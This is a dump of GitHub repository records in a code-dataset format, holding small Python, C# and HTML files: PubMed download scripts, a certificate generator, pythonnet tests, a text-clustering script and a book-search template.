ktrg:\n if str(kp).lower() in [str(x).lower() for x in pred[0]]:\n k = k+1\n tp[i] = k/df_val_k.iloc[i,3]\n return tp\n\n\nif __name__ == '__main__':\n mainpipe()\n"
},
{
"alpha_fraction": 0.5311614871025085,
"alphanum_fraction": 0.5336402058601379,
"avg_line_length": 35.20512771606445,
"blob_id": "91f2b4a21091222ee0381ff0447b9a93b72e4251",
"content_id": "87b237a7cbf4cc970e12f5ffc8631063f36a5bdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2824,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 78,
"path": "/mlflow/pmedpull.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "from pymed import PubMed\nimport mlflow\nimport click\nfrom collections import defaultdict\nimport json\nimport ast\n\n\[email protected](help=\"Pull records from Pubmed for given search term\"\n \"Search term should follow the query format\")\[email protected](\"--search_term\", default='test',\n help=\"https://pubmed.ncbi.nlm.nih.gov/advanced/\")\[email protected](\"--max_records\", default=10000,\n help=\"Limit the data size to run comfortably.\")\[email protected](\"--save_json\", default='pmed.json',\n help=\"Name of the output JSON file\")\[email protected](\"--inputfile\", default=1,\n help=\"Whether to use the input.txt\")\ndef querysave(search_term, max_records, save_json, inputfile):\n if inputfile == 1:\n with open(\"input.txt\", \"r\") as f:\n para = ast.literal_eval(f.read())\n search_term = para['search_term']\n max_records = para['max_records']\n save_json = para['save_json']\n with mlflow.start_run() as mlrun:\n pubmed = PubMed(tool=\"AlphabetH\", email=\"[email protected]\")\n query = search_term\n results = pubmed.query(query, max_results=max_records)\n pp = defaultdict(lambda: defaultdict(dict))\n for art in results:\n pmed = art.pubmed_id\n try:\n pp[pmed]['title'] = art.title\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = art.abstract\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.conclusions\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.methods\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.results\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['keywords'] = art.keywords\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['authors']= art.authors\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['journal'] = art.journal\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['pubdate'] = str(art.publication_date.year)\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['conclusions'] = art.conclusions\n except(AttributeError, TypeError):\n pass\n with open(save_json, 'w') as fp:\n json.dump(pp, fp)\n\n\nif __name__ == '__main__':\n querysave()\n"
}
] | 7 |
Ralfs1/darbs2
|
https://github.com/Ralfs1/darbs2
|
bc48b2076bbef2a141f6cb7819f74ae86ba4a665
|
b66b7601300422086ad9f8f1ccc4793ec9404fd0
|
3671586a154edeb0239eac3bcb1f6a83c19c3b00
|
refs/heads/master
| 2023-04-07T02:23:50.609844 | 2021-04-12T08:52:34 | 2021-04-12T08:52:34 | 357,122,825 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5403226017951965,
"alphanum_fraction": 0.6048387289047241,
"avg_line_length": 4.952381134033203,
"blob_id": "50d5a0042154e5d56e7b632abe5e08774c20e8d0",
"content_id": "df489bededc4fa170b805126560af8fa0d036673",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 21,
"path": "/main.py",
"repo_name": "Ralfs1/darbs2",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\napp.run(host='0.0.0.0', port=8020)"
}
] | 1 |
wunderlins/CD_course
|
https://github.com/wunderlins/CD_course
|
295f26fceab066210d751b73faecfe074a5bfea3
|
73bfe6a248d514f51698bd36905eb6411d8130f9
|
c3a8b92da0e8166596d5b709a9c4448501eba164
|
refs/heads/master
| 2020-04-22T13:28:01.946444 | 2014-05-24T15:18:22 | 2014-05-24T15:18:22 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5965555310249329,
"alphanum_fraction": 0.6068156957626343,
"avg_line_length": 18.775362014770508,
"blob_id": "f2244e4ba9a3a0ed0845ccdd837e892b55d20b60",
"content_id": "56ed3fc0ad4bd2e5ac11f2c68bd904844bf109c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2729,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 138,
"path": "/cert.py",
"repo_name": "wunderlins/CD_course",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n# expect parameters as arguments\n# parameters (or equivalent cgi GET parameter):\n# 1 $$name$$\n# 2 $$title$$\n# 3 $$date$$\n# 4 $$location$$\n# 5 $$trainer$$\n\nimport sys, os\nfrom subprocess import call\n\nis_cgi = False\n#check if this is a cgi request\nif 'REQUEST_METHOD' in os.environ :\n\t# Import modules for CGI handling \n\timport cgi, cgitb \n\tcgitb.enable()\n\t# Create instance of FieldStorage \n\tis_cgi = True\n\ndef usage():\n\tprint \"\"\"\n\n# 1 $$name$$\n# 2 $$title$$\n# 3 $$date$$\n# 4 $$location$$\n# 5 $$trainer$$\n\"\"\"\n\ninkscape_bin = \"/usr/bin/inkscape\"\narg = [\"exe\", \"name\", \"title\", \"date\", \"location\", \"trainer\"]\n\ndef main(argv=None):\n\t\n\tif argv is None:\n\t\targv = sys.argv\n\t\n\tif (len(argv) < 6):\n\t\tprint(\"Argument error %d\\n\") % len(sys.argv)\n\t\tprint argv\n\t\tusage()\n\t\tsys.exit(1)\n\t\n\t# load svg template\n\ttemplate = \"./cert_cd_1_template.svg\"\n\tif (is_cgi):\n\t\tform = cgi.FieldStorage()\n\t\ttry:\n\t\t\ttemplate = form[\"template\"].value\n\t\texcept:\n\t\t\tpass\n\t\n\ttry:\n\t\tfp = open(template, \"r\")\n\texcept IOError as e:\n\t\tprint \"I/O error({0}): {1}\".format(e.errno, e.strerror)\n\t\tfp.close()\n\t\tsys.exit(1)\n\texcept:\n\t\tprint \"Unexpected error:\", sys.exc_info()[0]\n\t\tfp.close()\n\t\tsys.exit(1)\n\t\n\tbuffer = fp.read();\n\tfp.close()\n\t\n\t# subsitute values in svg\n\tfor (i, keyword) in enumerate(arg):\n\t\trepl = '$$' + keyword + '$$'\n\t\tbuffer = buffer.replace(repl, argv[i])\n\t\n\t# write temp svg file\n\tpid = os.getpid()\n\t\n\tfile_base = \"./tmp/out-%d\" % (pid)\n\tfile_svg = file_base + \".svg\"\n\t\n\ttry:\n\t\tfp = open(file_svg, \"wb+\")\n\texcept IOError as e:\n\t\tprint \"I/O error({0}): {1}\".format(e.errno, e.strerror)\n\t\tfp.close()\n\t\tsys.exit(1)\n\texcept:\n\t\tprint \"Unexpected error:\", sys.exc_info()[0]\n\t\tfp.close()\n\t\tsys.exit(1)\n\t\n\tfp.write(buffer)\n\tfp.close()\n\t\n\t# convert svg to pdf\n\t# /usr/bin/inkscape --export-pdf=FILENAME\n\tfile_pdf = file_base + \".pdf\"\n\tcall([inkscape_bin, \"--export-pdf=\"+file_pdf, file_svg])\n\tstatinfo = os.stat(file_pdf)\n\t\n\t# stream pdf result\n\tsys.stdout.write(\"Content-type: application/pdf\\n\")\n\tsys.stdout.write(\"Content-length: %d\\n\" % statinfo.st_size)\n\tsys.stdout.write(\"Content-disposition: inline; filename='CD_certifcate.pdf'\\n\\n\")\n\t\n\ttry:\n\t\tfp = open(file_pdf, \"r\")\n\texcept IOError as e:\n\t\tprint \"I/O error({0}): {1}\".format(e.errno, e.strerror)\n\t\tfp.close()\n\t\tsys.exit(1)\n\texcept:\n\t\tprint \"Unexpected error:\", sys.exc_info()[0]\n\t\tfp.close()\n\t\tsys.exit(1)\n\tprint fp.read()\n\tfp.close()\n\t\n\t# remove files\n\tos.remove(file_svg)\n\tos.remove(file_pdf)\n\t\nif __name__ == \"__main__\":\n\ta = None\n\tif (is_cgi):\n\t\tform = cgi.FieldStorage() \n\t\t\n\t\ta = [\"cgi\", \"\", \"\", \"\", \"\", \"\"]\n\t\t\n\t\tfor i in form.keys():\n\t\t\t#print i\n\t\t\ttry:\n\t\t\t\tix = arg.index(i)\n\t\t\t\ta[ix] = form[i].value\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\t\n\tsys.exit(main(a))\n"
}
] | 1 |
zfq308/pythonnet
|
https://github.com/zfq308/pythonnet
|
bc7a5e2b1cbe6c7657f4a119a22d26f141831de9
|
d86880a81ee5e52eeb855cf93b452167c4aa5ddf
|
670960608656eedb9530e682af82d55d998bfbee
|
refs/heads/master
| 2021-01-21T07:00:20.067241 | 2017-02-22T17:02:53 | 2017-02-22T17:02:53 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6633266806602478,
"alphanum_fraction": 0.679358720779419,
"avg_line_length": 26.72222137451172,
"blob_id": "14fb61acdeb8b1aa52b3ea2ff4fcb74806e66882",
"content_id": "53433449196d1db3495290d7d82d1f76f43587c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 998,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 36,
"path": "/src/tests/conftest.py",
"repo_name": "zfq308/pythonnet",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# TODO: move tests one out of src to project root.\n# TODO: travis has numpy on their workers. Maybe add tests?\n\n\"\"\"Helpers for testing.\"\"\"\n\nimport ctypes\nimport os\nimport sys\nimport sysconfig\n\nimport clr\n\n# Add path for `Python.Test`\ncwd = os.path.dirname(__file__)\nfixtures = os.path.join(cwd, 'fixtures')\nsys.path.append(fixtures)\n\n# Add References for tests\nclr.AddReference(\"Python.Test\")\nclr.AddReference(\"System.Collections\")\nclr.AddReference(\"System.Data\")\n\n\ndef pytest_report_header(config):\n \"\"\"Generate extra report headers\"\"\"\n # FIXME: https://github.com/pytest-dev/pytest/issues/2257\n is_64bits = sys.maxsize > 2**32\n arch = \"x64\" if is_64bits else \"x86\"\n ucs = ctypes.sizeof(ctypes.c_wchar)\n libdir = sysconfig.get_config_var(\"LIBDIR\")\n shared = bool(sysconfig.get_config_var(\"Py_ENABLE_SHARED\"))\n\n header = (\"Arch: {arch}, UCS: {ucs}, LIBDIR: {libdir}, \"\n \"Py_ENABLE_SHARED: {shared}\".format(**locals()))\n return header\n"
},
{
"alpha_fraction": 0.5042441487312317,
"alphanum_fraction": 0.5105093121528625,
"avg_line_length": 32.43243408203125,
"blob_id": "b09ac11990680b14ad64f7a243d2170ec0875d24",
"content_id": "88910147c204b85403af46777d3efd6bc20aa516",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C#",
"length_bytes": 4948,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 148,
"path": "/src/embed_tests/pytuple.cs",
"repo_name": "zfq308/pythonnet",
"src_encoding": "UTF-8",
"text": "using System;\nusing NUnit.Framework;\nusing Python.Runtime;\n\nnamespace Python.EmbeddingTest\n{\n public class PyTupleTest\n {\n /// <summary>\n /// Tests set-up. Being used to skip class on Travis/PY27\n /// </summary>\n /// <remarks>\n /// FIXME: Fails on Travis/PY27: All tests below (unless otherwise stated)\n /// Fatal Python error: auto-releasing thread-state, but no thread-state for this thread\n /// Stacktrace:\n /// at (wrapper managed-to-native) Python.Runtime.Runtime.PyGILState_Release (intptr)\n /// at Python.Runtime.PythonEngine.ReleaseLock (intptr)\n /// at Python.Runtime.PythonException.Dispose ()\n /// at Python.Runtime.PythonException.Finalize ()\n /// at (wrapper runtime-invoke) object.runtime_invoke_virtual_void__this__ (object,intptr,intptr,intptr)\n /// </remarks>\n [SetUp]\n public void SetUp()\n {\n if (Environment.GetEnvironmentVariable(\"TRAVIS\") == \"true\" &&\n Environment.GetEnvironmentVariable(\"TRAVIS_PYTHON_VERSION\") == \"2.7\")\n {\n Assert.Ignore(\"Fails on Travis/PY27: Fatal Python error: auto-releasing thread-state, but no thread-state for this thread\");\n }\n }\n\n /// <summary>\n /// Test IsTupleType without having to Initialize a tuple.\n /// PyTuple constructor use IsTupleType. This decouples the tests.\n /// </summary>\n /// <remarks>\n /// Travis PY27 intermittently fails this test. Indicates issue is\n /// most likely with PyTuple.IsTupleType\n /// </remarks>\n [Test]\n public void TestStringIsTupleType()\n {\n using (Py.GIL())\n {\n var s = new PyString(\"foo\");\n Assert.IsFalse(PyTuple.IsTupleType(s));\n }\n }\n\n /// <summary>\n /// Test IsTupleType with Tuple.\n /// </summary>\n [Test]\n public void TestPyTupleIsTupleType()\n {\n using (Py.GIL())\n {\n var t = new PyTuple();\n Assert.IsTrue(PyTuple.IsTupleType(t));\n }\n }\n\n [Test]\n public void TestPyTupleEmpty()\n {\n using (Py.GIL())\n {\n var t = new PyTuple();\n Assert.AreEqual(0, t.Length());\n }\n }\n\n /// <remarks>\n /// FIXME: Unable to unload AppDomain, Unload thread timed out.\n /// Seen on Travis/AppVeyor on both PY2 and PY3. Causes Embedded_Tests\n /// to hang after they are finished for ~40 seconds until nunit3 forces\n /// a timeout on unloading tests. Doesn't fail the tests though but\n /// greatly slows down CI. nunit2 silently has this issue.\n /// </remarks>\n [Test]\n [Ignore(\"GH#397: Travis/AppVeyor: Unable to unload AppDomain, Unload thread timed out\")]\n public void TestPyTupleInvalidAppend()\n {\n using (Py.GIL())\n {\n PyObject s = new PyString(\"foo\");\n var t = new PyTuple();\n Assert.Throws<PythonException>(() => t.Concat(s));\n }\n }\n\n [Test]\n public void TestPyTupleValidAppend()\n {\n using (Py.GIL())\n {\n var t0 = new PyTuple();\n var t = new PyTuple();\n t.Concat(t0);\n Assert.IsNotNull(t);\n Assert.IsInstanceOf(typeof(PyTuple), t);\n }\n }\n\n [Test]\n public void TestPyTupleStringConvert()\n {\n using (Py.GIL())\n {\n PyObject s = new PyString(\"foo\");\n PyTuple t = PyTuple.AsTuple(s);\n Assert.IsNotNull(t);\n Assert.IsInstanceOf(typeof(PyTuple), t);\n Assert.AreEqual(\"f\", t[0].ToString());\n Assert.AreEqual(\"o\", t[1].ToString());\n Assert.AreEqual(\"o\", t[2].ToString());\n }\n }\n\n [Test]\n public void TestPyTupleValidConvert()\n {\n using (Py.GIL())\n {\n var l = new PyList();\n PyTuple t = PyTuple.AsTuple(l);\n Assert.IsNotNull(t);\n Assert.IsInstanceOf(typeof(PyTuple), t);\n }\n }\n\n /// <remarks>\n /// FIXME: Possible source of intermittent AppVeyor PY27: Unable to unload AppDomain.\n /// FIXME: Intermittent Issue on Travis PY33: Fatal Python error: PyMUTEX_LOCK(gil_mutex) failed. Seen twice.\n /// </remarks>\n [Test]\n public void TestNewPyTupleFromPyTuple()\n {\n using (Py.GIL())\n {\n var t0 = new PyTuple();\n var t = new PyTuple(t0);\n Assert.IsNotNull(t);\n Assert.IsInstanceOf(typeof(PyTuple), t);\n }\n }\n }\n}\n"
}
] | 2 |
pdmahadevan/gittest
|
https://github.com/pdmahadevan/gittest
|
933e0464e145317ddb0d7e3e01ceedeed77f4cc9
|
4a163655bf4caa33bf65c6d993f4dbcca5fc5862
|
e6f1726007f918c0aab295559a20392cbdf5d5f0
|
refs/heads/master
| 2021-01-19T10:14:47.717262 | 2017-04-10T18:19:43 | 2017-04-10T18:19:43 | 87,843,544 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4655172526836395,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 18.33333396911621,
"blob_id": "5772d738b764dc4f1c78dcf3875c1c39c98d921e",
"content_id": "b9a96bd60b00ccc2547f46ef45cba6719e1e6553",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 3,
"path": "/test1.py",
"repo_name": "pdmahadevan/gittest",
"src_encoding": "UTF-8",
"text": "def fac(n):\n if n==1: return 1;\n return n*fac(n-1);\n"
}
] | 1 |
Aishwarya20/be-project-search-engine
|
https://github.com/Aishwarya20/be-project-search-engine
|
3dcf6d881f16e3fbc7671e1e510c528c0092a125
|
1cfb89c2e66b138a240da66d2c5c4716c0cd7403
|
1f4e6780e6023e32f79b1406b2450eb55f78778c
|
refs/heads/master
| 2021-01-19T23:43:31.782635 | 2017-04-30T09:20:51 | 2017-04-30T09:20:51 | 89,004,660 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.639848530292511,
"alphanum_fraction": 0.6473305225372314,
"avg_line_length": 36.66428756713867,
"blob_id": "2aad0b851f939d975b144701315505fc7aaa5ce9",
"content_id": "fac796ddb46797c0402f521a977b7757a80834a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10826,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 280,
"path": "/cluster_text.py",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "# raw text-> removal of stop words, tokenize and stem using nltk Snowball\r\n# created tf-idf matrix using scikit. Feature names are extracted and used as labels in dendrogram\r\n# created similarity matrix using cosine similarity\r\n# k-means clustering for documents and words. Here we start with a k=2 value and increase it in every iteration\r\n# Use the cosine distance between data points and cetroid to decide on the k value\r\n#The minute the value becomes same we stop the iteration with different k values\r\n#To cross check we can see that the _inertia value reaches the elbow point generally used to determine the k value\r\n#dumping the document similarity and word similarity matrix into a json file for chord diagram\r\nfrom __future__ import print_function\r\nfrom collections import Counter\r\nfrom nltk.corpus import stopwords\r\nimport re\r\nimport codecs\r\nimport pandas as pd\r\nfrom nltk.stem.snowball import SnowballStemmer\r\nimport os\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,euclidean_distances\r\nfrom scipy.cluster.hierarchy import ward, dendrogram,linkage,fcluster,cophenet,distance\r\nimport scipy.cluster.hierarchy as hier\r\nimport matplotlib.pyplot as plt\r\nimport json\r\nimport random\r\nimport numpy as np\r\nfrom collections import defaultdict\r\nimport sys\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.externals import joblib\r\nfrom decimal import *\r\n#creating a set of stopwords provided by nltk\r\nstopword=set(stopwords.words(\"english\"))\r\n#instatiating the class SnowballStemmer for stemming and getting root words\r\nstemmer=SnowballStemmer(\"english\")\r\n\r\ndef get_cluster_classes(den, label='ivl'):\r\n cluster_idxs = defaultdict(list)\r\n for c, pi in zip(den['color_list'], den['icoord']):\r\n for leg in pi[1:3]:\r\n i = (leg - 5.0) / 10.0\r\n if abs(i - int(i)) < 1e-5:\r\n cluster_idxs[c].append(int(i))\r\n\r\n cluster_classes ={}\r\n for c, l in cluster_idxs.items():\r\n i_l = [den[label][i] for i in l]\r\n cluster_classes[c] = i_l\r\n\r\n return cluster_classes\r\n\r\ndef tokenize(raw_text):\r\n tokens=re.findall('[a-zA-Z]+',raw_text.lower())\r\n return set(tokens)-stopword\r\n\r\ndef tokenize_and_stem(raw_text):\r\n tokens=re.findall('[a-zA-Z]+',raw_text.lower())\r\n allwords_tokenize=set(tokens) - stopword\r\n return [stemmer.stem(t) for t in allwords_tokenize if len(t)>2]\r\n\r\ndef get_files(raw_path):\r\n files_extracted=[]\r\n root_extracted=[]\r\n print (\"Files in: \" +raw_path)\r\n root_extracted.append(raw_path)\r\n for current_doc_id, current_file in enumerate(os.listdir(raw_path)):\r\n files_extracted.append(current_file)\r\n return files_extracted,root_extracted\r\n\r\n\r\n\r\ndef linkage_matrix_rep(sim_matrix):\r\n methods=['average','single','complete','weighted']\r\n c_final=0.0\r\n method_final=''\r\n final_linkage=linkage(sim_matrix)\r\n for method in methods:\r\n linkage_matrix = linkage(sim_matrix,method=method)\r\n c, coph_dists = cophenet(linkage_matrix, distance.pdist(sim_matrix))\r\n if c>c_final:\r\n c_final=c\r\n final_linkage=linkage_matrix\r\n method_final=method\r\n cd_final=coph_dists\r\n return c_final,method_final,final_linkage,cd_final\r\n\r\ndef file_extract(roots,files):\r\n genre_doc=[]\r\n for root in roots:\r\n for filename in files:\r\n with codecs.open(root+'\\\\'+filename, \"r\",encoding='utf-8', errors='ignore') as file_name:\r\n text=file_name.read()\r\n genre_doc.append(text)\r\n return genre_doc\r\n\r\ndef main(args):\r\n #input directory\r\n dir_to_process=args\r\n files,roots=get_files(dir_to_process)\r\n\r\n\r\n totalvocab_tokenized=[]\r\n totalvocab_stemmed=[]\r\n\r\n ebook=\"\"\r\n ebooks=[]\r\n doc_name=[]\r\n\r\n\r\n #tokenization,removal of stopwords,stemming\r\n for root in roots:\r\n for filename in files:\r\n with codecs.open(root+'\\\\'+filename, \"r\",encoding='utf-8', errors='ignore') as file_name:\r\n text=file_name.read()\r\n\r\n ebook=ebook+\"\\n\"+text\r\n ebooks.append(text)\r\n\r\n doc_name.append(filename)\r\n allwords_tokenize=tokenize(text)\r\n\r\n totalvocab_stemmed.extend([stemmer.stem(t) for t in allwords_tokenize])\r\n totalvocab_tokenized.extend(allwords_tokenize)\r\n file_name.close()\r\n\r\n vocab_frame = pd.DataFrame({'words': totalvocab_tokenized}, index = totalvocab_stemmed)\r\n print ('there are ' + str(vocab_frame.shape[0]) + ' items in vocab_frame')\r\n print (vocab_frame.head())\r\n\r\n #Creation of tf-idf matrix and vectorizer\r\n tfidf_vectorizer = TfidfVectorizer(max_features=200,min_df=0.01,\r\n stop_words='english',\r\n tokenizer=tokenize_and_stem,ngram_range=(1,3),dtype='double')\r\n tfidf_matrix= tfidf_vectorizer.fit_transform(ebooks) #fit the vectorizer to synopses\r\n terms = tfidf_vectorizer.get_feature_names()\r\n\r\n #cosine distance for documents\r\n doc_sim =1-cosine_similarity(tfidf_matrix)\r\n\r\n # clustering using hierarchical clustering for documents\r\n #doc_cophen:cophenectic correlation value,doc_method:method used for calculating cophenetic distance,doc_linkage_matrix:linkage matrix,doc_cd:cophenetic distance\r\n doc_cophen,doc_method,doc_linkage_matrix,doc_cd = linkage_matrix_rep(doc_sim)\r\n\r\n #k-means clustering:document-document clustering\r\n num_clusters = 2\r\n getcontext().prec=2\r\n avg_distance=0.0\r\n flag=True\r\n prev_iter=0.0\r\n current_iter=0.0\r\n random.seed(10)\r\n while flag:\r\n km = KMeans(n_clusters=num_clusters,n_init= 1)\r\n km.fit(tfidf_matrix)\r\n joblib.dump(km,'doc_cluster.pkl')\r\n #km = joblib.load('doc_cluster.pkl')\r\n clusters = km.labels_.tolist()\r\n print(km.inertia_)\r\n centers=km.cluster_centers_\r\n sum_dist=0.0\r\n for i in range(0,len(doc_name)):\r\n clus=clusters[i]\r\n center=centers[clus:]\r\n doc=tfidf_matrix[i:]\r\n dist=1-cosine_similarity(doc,center)\r\n sum_dist=sum_dist+dist[0][0]\r\n avg=Decimal(sum_dist)/Decimal(len(doc_name))\r\n #print (sum_dist)\r\n print(avg)\r\n current_iter=Decimal(avg)-Decimal(avg_distance)\r\n if Decimal(prev_iter)-Decimal(current_iter)==Decimal(0):\r\n flag=False\r\n else:\r\n prev_iter=current_iter\r\n num_clusters=num_clusters+1\r\n\r\n print(clusters)\r\n cluster_doc=pd.DataFrame({\"doc_cluster\":clusters,\"doc_name\":doc_name})\r\n cluster_doc.to_csv('doc_to_cluster_map.csv',sep=',',index=False)\r\n\r\n #formation of dendrogram for document-document similarity\r\n fig, ax = plt.subplots(figsize=(15,20)) # set size\r\n ax = dendrogram(doc_linkage_matrix, orientation=\"left\", labels=doc_name)\r\n plt.tick_params(\\\r\n axis= 'x', # changes apply to the x-axis\r\n which='both', # both major and minor ticks are affected\r\n bottom='off', # ticks along the bottom edge are off\r\n top='off', # ticks along the top edge are off\r\n labelbottom='off')\r\n\r\n plt.tight_layout() #show plot with tight layout\r\n\r\n #save figure of the document clustering dendrogram\r\n plt.savefig('cosine_cluster_doc_test.png', dpi=200) #save figure as ward_clusters\r\n\r\n #getting the cluster to which document belongs\r\n doc_classes=get_cluster_classes(ax)\r\n thresh_doc=len(doc_classes)\r\n print(thresh_doc)\r\n\r\n #creating csv file containing document cluster,doc_id,doc_name\r\n cluster_index={}\r\n i=0\r\n doc_id=[]\r\n book_name=[]\r\n for c in doc_classes.keys():\r\n cluster_index[c]=i\r\n i=i+1\r\n for c in doc_classes.keys():\r\n for files in doc_classes[c]:\r\n doc_id.append(cluster_index[c])\r\n book_name.append(files)\r\n\r\n #Starting word clustering\r\n #word to word similarity\r\n word_vector=tfidf_matrix.transpose()\r\n word_vector=word_vector.A\r\n\r\n word_sim=1-cosine_similarity(word_vector)\r\n #print (word_sim)\r\n\r\n #linkage matrix created for the words\r\n word_cophen,word_method,word_linkage_matrix,word_cd = linkage_matrix_rep(word_sim)\r\n #print (word_cophen)\r\n #print (word_method)\r\n fig, ax = plt.subplots(figsize=(15, 20))\r\n final_terms=[]\r\n for term in terms:\r\n final_terms.append(vocab_frame.ix[term].values.tolist()[0][0])\r\n\r\n ax = dendrogram(word_linkage_matrix, orientation=\"left\",labels=final_terms,show_contracted=True)\r\n plt.tick_params(\\\r\n axis= 'x', # changes apply to the x-axis\r\n which='both', # both major and minor ticks are affected\r\n bottom='off', # ticks along the bottom edge are off\r\n top='off', # ticks along the top edge are off\r\n labelbottom='off')\r\n\r\n plt.tight_layout() #show plot with tight layout\r\n #saving figure of word-word clustering\r\n plt.savefig('cosine_cluster_word_test.png', dpi=200) #save figure as ward_clusters\r\n\r\n #Constructing a chord diagram\r\n r = lambda: random.randint(0,255)\r\n color=[]\r\n for i in range(len(doc_name)):\r\n color.append('#%02X%02X%02X' % (r(),r(),r()))\r\n\r\n #chord diagram:document-document similarity\r\n #color of arcs of document-document chord diagram\r\n doc_color=pd.DataFrame({'doc':doc_name,'color':color})\r\n doc_color.to_csv('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\dataset_doc.csv',sep=',',index=False)\r\n #creating json matrix of the document similarity matrix for percentage similarity chord diagram\r\n doc_sim_list=cosine_similarity(tfidf_matrix).tolist()\r\n #print(doc_sim_list)\r\n with open('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\doc_cos_dist.json', 'r') as f:\r\n json_data = json.load(f)\r\n json_data= doc_sim_list\r\n with open('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\doc_cos_dist.json', 'w') as f:\r\n f.write(json.dumps(json_data))\r\n\r\n\r\n #chord diagram:word-word similarity\r\n #colors of the arcs of chord diagram\r\n color_word=[]\r\n for i in range(len(terms)):\r\n color_word.append('#%02X%02X%02X' % (r(),r(),r()))\r\n word_color=pd.DataFrame({'word':terms,'color':color_word})\r\n word_color.to_csv('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\dataset-1_word.csv',sep=',',index=False)\r\n\r\n #purpose of displaying percentage of similarity in chord diagram\r\n word_sim_list=cosine_similarity(word_vector).tolist()\r\n #print(word_sim_list)\r\n\r\n with open('C:\\Users\\Aishwarya Sadasivan\\Python_Codes\\js\\word_cos_dist.json', 'wb') as outfile:\r\n json.dump(word_sim_list, outfile)\r\n outfile.close()\r\n\r\n\r\nif __name__=='__main__':\r\n main(sys.argv[1])\r\n"
},
{
"alpha_fraction": 0.5182892680168152,
"alphanum_fraction": 0.5649971961975098,
"avg_line_length": 31.907407760620117,
"blob_id": "063088b65e63dc71fe8450cd856016830c460416",
"content_id": "16763c8f3baa5e9eef7511fbeff06b38291d555c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1777,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 54,
"path": "/template/content.html",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <title>Files for download</title>\n <head>\n <link rel=\"stylesheet\" href=\"http://127.0.0.1:5000/js/css/StyleSheet.css\" type=\"text/css\"/>\n\n\n\t</head>\n<body style=\"background-image:url(http://127.0.0.1:5000/js/css/uploads/book_background_like-4.jpg)\">\n\n\t\t <div id=\"header\">\n\t\t<div id=\"title\"><i>Reader's Paradise</i></div>\n\t\t<div id=\"slogan\">Dive into the world of reading!</div>\n\t\t<div id=\"nav\">\n\t\t<ul>\n\t\t<a href=\"http://127.0.0.1:5000/js/feedback.html\"><li><span class=\"fa fa-users\"></span> FEEDACK</li></a>\n <a href=\"#\"><li> DATA VISUALISATION\n <ul>\n \t\t<a href=\"http://127.0.0.1:5000/js/datavisualisation.html\"><li> DOCUMENT SIMILARITY</li></a>\n \t\t<a href=\"http://127.0.0.1:5000/js/visualization_word.html\"><li> WORD SIMILARITY</li></a>\n \t\t</ul>\n\n</li></a>\n\n <a href=\"http://127.0.0.1:5000/js/search.html\"><li><span class=\"fa fa-inr\"></span> SEARCH</li></a>\n\t\t<a href=\"http://127.0.0.1:5000/js/home.html\"><li><span class=\"fa fa-home\"></span>HOME</li></a>\n\t\t</ul>\n\t\t</div>\n\n<div class=\"col_1\" style=\"height:auto\">\n<h3>Showing results for:{{query}}</h3>\n<h4>Click to download the books below!</h4>\n{% for key,value in dloads.iteritems() %}\n {% for file in dloads[key]%}\n {% set inner_loop=loop %}\n\n {% if inner_loop.index0 == 0 %}\n <br>\n Book Name:<a href=\"{{ file }}\" download>{{ keys[key][inner_loop.index0] }}</a>\n <h5>Related Books:</h5>\n {% if count[key] == 1 %}\n <li>No related books found!</li>\n {% endif %}\n\n {% else %}\n\n <li>Book Name:<a href=\"{{ file }}\" download>{{ keys[key][inner_loop.index0] 